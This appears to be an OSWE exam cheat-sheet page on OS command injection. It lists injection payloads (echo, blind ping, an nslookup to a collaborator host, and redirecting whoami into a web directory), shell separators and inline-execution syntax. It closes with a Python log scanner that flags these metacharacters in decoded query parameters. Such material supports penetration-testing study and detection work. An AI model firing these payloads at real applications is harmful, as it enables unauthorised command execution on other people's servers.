💻
OSWE Everything

Exploitation

Do not forget to URL-encode the payload.

Reflected

& echo test123 &

Blind

& ping -c 10 127.0.0.1 &

Blind (ping RCE listener)

Kali:

tcpdump -i <NETWORK_CARD> icmp

Victim:

& ping <KALI_IP> &

Blind OAST

& nslookup collaborator-link.net &

Blind redirecting the input

& whoami > /var/www/static/whoami.txt &

Command separators

&
&&
|
||

More command separators

Newline (0x0a or \n)
;

Inline Command Execution (Linux)

`command`
$(command)

Check if command is executed via cmd or powershell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
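
Detection view of the URL-encoding note and the separator lists above, as an added example that is not part of the original page: it percent-decodes query parameters from access-log lines and flags values that contain the shell metacharacters listed here. The log lines, regexes and function names are constructed for illustration, and a match is a triage signal with false positives, not proof of execution.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Shell metacharacters listed on this page: separators (& && | || ; newline)
# and Linux inline execution (`command`, $(command)).
SHELL_META = re.compile(r"[&|;\n`]|\$\(")
REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for query values holding shell metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    hits = []
    # parse_qsl splits on raw '&' first, then percent-decodes each value once,
    # so only an encoded separator (%26, %7C, %3B, %0a ...) ends up inside a value.
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        value = decode_fully(value)
        if SHELL_META.search(value):
            hits.append((name, value))
    return hits

# Constructed access-log lines (not real traffic); payloads reuse this page's strings.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /feedback?email=a%40example.com&msg=hello HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /feedback?email=x%26+echo+test123+%26 HTTP/1.1" 200 530',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /feedback?email=x%0aping+-c+10+127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /feedback?email=%24%28whoami%29 HTTP/1.1" 200 512',
]

def scan(lines):
    """Map 1-based line number -> hits, for lines with at least one hit."""
    return {n: h for n, line in enumerate(lines, 1) if (h := suspicious_params(line))}

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

The first sample line is benign: its raw `&` only separates two parameters, which is why the check has to run on decoded values rather than on the raw request line.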

Last updated 1 month ago